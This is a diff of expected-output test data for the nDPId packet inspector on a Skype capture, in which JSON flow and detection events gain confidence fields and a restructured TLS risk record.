 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431969643044,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969643044,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZzYAAEARkAPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431969643092,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1431969643092,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1yqcAQLnbD6CBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAgABBfOIaY="}
-00761{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
+00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":51,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431969643092,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643093,"flow_last_seen":1431969643093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969643093,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1431969643093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969643093,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi9JAAEAGs6fAqAEiF84hpsNtAbuewXptAAAAALAC\/\/+RHQAAAgQFtAEDAwUBAQgKPiKOJwAAAAAEAgAA"}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1431969643139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969643139,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w20Yoc3insF6bqASOJBNnAAAAgQFrAQCCArsLkk6PiKOJwEDAwU="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1431969643139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969643139,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z0xAAEAGcDnAqAEiF84hpsNtAbuewXpuGKHN44AQECyklQAAAQEICj4ijlTsLkk6"}
-00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"skype.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969643093,"flow_last_seen":1431969643140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1431969643140,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50029,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apps.skype.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABDNYcAAEARwa\/AqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1431969643186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1431969643186,"pkt":"0NQSxnP1PBXCt3IOCABFAABD3H8AAEARGrfAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1431969643343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431969643343,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7eVIAAEARfezAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="}
@@ -81,10 +81,10 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"skype.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1431969643944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969643944,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYXlAAEAG9xvAqAEiQTffIcNuAbtcUOQ7AAAAALAC\/\/9\/kQAAAgQFtAEDAwUBAQgKPiKRcAAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1431969643971,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969643971,"pkt":"0NQSxnP1PBXCt3IOCABFAABLW5oAAEARm5TAqAEiwKgBAeuAADUAN9PqYyoBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"skype.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643971,"flow_last_seen":1431969643971,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969643971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1431969643972,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969643972,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe5YAAEARe5jAqAEiwKgBAeF+ADUAN7bIb04BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969643972,"flow_last_seen":1431969643972,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431969643972,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57726,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431969644054,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431969644054,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6xBwAAEARMyPAqAEiwKgBAcLvADUAJlJY1+QBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXA0AAEARmyzAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431969644055,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969644055,"pkt":"0NQSxnP1PBXCt3IOCABFAABAi\/oAAEARaz\/AqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"}
@@ -105,7 +105,7 @@
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"skype.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431969646148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431969646148,"pkt":"0NQSxnP1PBXCt3IOCABFAABLNJ0AAEARwpHAqAEiwKgBAeF+ADUAN7bIb04BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431969648258,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"ts_msec":1431969648258,"pkt":"AQBef\/\/6oPPBbTu2CABFAAE\/AooAAAQRAYTAqAD+7\/\/\/+gQBB2wBK+71Tk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cG5wOnJvb3RkZXZpY2UNCg0K"}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969648258,"flow_last_seen":1431969648258,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1431969648258,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1431969648274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"ts_msec":1431969648274,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRAosAAAQRAXHAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"}
 00917{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1431969648291,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"ts_msec":1431969648291,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHAowAAAQRATrAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969649862,"flow_last_seen":1431969649862,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"ts_msec":1431969649862,"l3_proto":"ip4","src_ip":"108.160.170.46","dst_ip":"192.168.1.34","src_port":443,"dst_port":49445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -114,79 +114,79 @@
 01761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1431969649865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"ts_msec":1431969649865,"pkt":"0NQSxnP1PBXCt3IOCABFAAPu\/qxAAEAGX8TAqAEibKCqLsElAbuoJs3QuGHot4AYEACQpAAAAQEICj4iqE9henRtFwMBACCGlFiiXnGNbnUA8eFNVg97y26hgjzRrXr8V0YtIj6nMBcDAQOQKBOjiVJxpWdYeLLT\/Xbro3HQPBzjJPC4nFo8EDiP\/qwXTbKKHYw0zh5BjL36gX1CXDX+RahFJG73NIEjJWIM604+RslBUiVdP7BtOTwH9Na9fDbxf2Np60NBtc7IDn0njVPn\/OQFpDztHwH7ReKVzxI3mekCkJeQu5frlXMtzYs\/A6\/788RG\/9eQL\/SpUlGx+OzCYIvqD3TfRfjbcI0rUIMK13b81m\/QfwBa7fmPZMBLpKLV+owE6zVvsZhb2YounO4vXImcKbLXc+pHduRZUFgR7JTndx4BwWKNOeOJb0lOXmVFpPD2t5ChyQpB8B7yAVMimVYrMkRjOI+yOmuEWzpBBb71HAu2RXfIAr1ik+\/qd4k78SdOCRVzA9X9FlfHQtMw2+\/RMHqj5tfPuEb1dJqljOBer+yTyAiFyXzsxxDLI9ugRcdcvYukWjNLVzxsQTVIpyochPhHmfXZ5n\/eZ4dJphlsEijiHWw2q71oBZmMc5GGD6vO7ZjLO3AJWFPWmwoscaJzsLs58ocuQ2qdcOCA7GGVHN\/ijVl75hciIPcfOvLZ6urcFhUq1WWuqtEbVnfmbri38YkIXbc7ejHLENq2QCqsgj5enMQz75I2\/pet\/YCSsRs1eqVYMNg8xjXCKqSJQl62\/bTcGsNwyoxippOcJq8VpG7H7Fvy+AXb68gGTkeGTRQKqtF74u9vbasRDNwPq8\/DPKRvzqNHk914l9uHQ2AKRiwOC\/bnlDR9ocQFekQhsprf\/xDrXO7tscQNAKBRL+tD76zQwjIPz3PJEHN3Pc+QE5WHu5rFSvvxfz\/Z2\/HSf2Um2ZE3koBnXh0ea61MNA9NADFAPSD8Z5NIyJgusH5hoNWKXVoIkzU5GHgbwG14JuajpHBJlMNEXsfmLLVK9oYSSz6nK+qKkyM3mC7X8XBCMQsh\/0ouHgH6HndraUIKsjtp3JPkKjI4aYdJ0qIoz0PG\/x3wOUA4h1YDaa67wXVn4YAKaKBMtrlL40SzVa5Z91cUYV13ZvBCGjlszRtWPZdtD1L\/SaFfIp1tQJKNS\/3Rzkx+IjbAX1llTBgWy3mJMF73JAKDegzbMvdSvKJ6AUv810GsIeQ99gKRkiy\/yhCs7P73CjnzDITEbSmsOsmYIQAoX97vBTFy0OqF392JfqJYzpguRdJo39kQQV95yc415TouOPz9jkaLSSogaYBmY8ija5cax3+df915"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431969652367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969652367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+qlYAAEARtuTAqAEiQAQXpjLdnFYAKjPsm5AC0vz7eA6m1WQz3XSdSXIE0xPsZ0Mgdb244ufZVMBp9g=="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969652367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
